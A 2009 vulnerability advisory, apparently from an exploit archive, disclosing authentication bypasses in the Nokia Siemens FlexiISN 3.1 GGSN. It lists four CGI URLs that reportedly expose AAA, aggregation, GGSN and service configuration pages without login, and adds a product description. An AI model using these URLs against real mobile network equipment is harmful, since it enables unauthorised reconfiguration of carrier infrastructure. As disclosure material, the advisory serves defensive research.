NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities

Type exploitpack
Reporter TaMBaRuS
Modified 2009-03-30T00:00:00


NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities

                                            NOKIA Siemens FlexiISN GGSN Multiple Authentication bypass Vulnerability: NOKIA Siemens FlexiISN

Remote:  Yes  

Local:  No 

Class: Input Validation Error 

Critical: Moderately critical  

OS : FlexiISN (GGSN) FISN 3.1

URL 1 for bypassing authentication on AAA Configuration: http://[Flexi-ISN IP]/cgi-bin/aaa.tcl?

URL 2 for bypassing authentication on Aggregation Class Configuration : http://[Flexi-ISN IP]/cgi-bin/aggr_config.tcl?

URL 3 for bypassing authentication on GGSN general Configuration : http://[Flexi-ISN IP]/opt/cgi-bin/ggsn/cgi.tcl?page=ggsnconf

URL 4 for bypassing authentication on Network Access & services : http://[Flexi-ISN IP]/opt/cgi-bin/services.tcl?instance=default

Published: March 30, 2009

Discovered by: TaMbaRuS (


Greetz: Mr. Gabriel Waller from NSN for all his support for researching on the vulnerabilities.


The Flexi ISN, which performs GPRS Gateway Service Node (GGSN) and data charging functionalities, 
is fully integrated with the existing Nokia Siemens Networks charge@once prepaid solution to enable 
flexible charging of data services. The systems integration services ensure seamless consumer experience, 
while managing an increasingly complex combination of new processes and systems.

With the introduction of Flexi ISN, mobile telekom service provider is able to combine all in one box a 
GGSN and an Intelligent Charging Node. The deployed Flexi ISN 3.1 system is able, through deep packet 
inspection, to distinguish the type of traffic such as HTTP browsing, WAP browsing, MMS, streaming, 
content download thus enabling different charging models based on the type of data service used.

# [2009-03-30]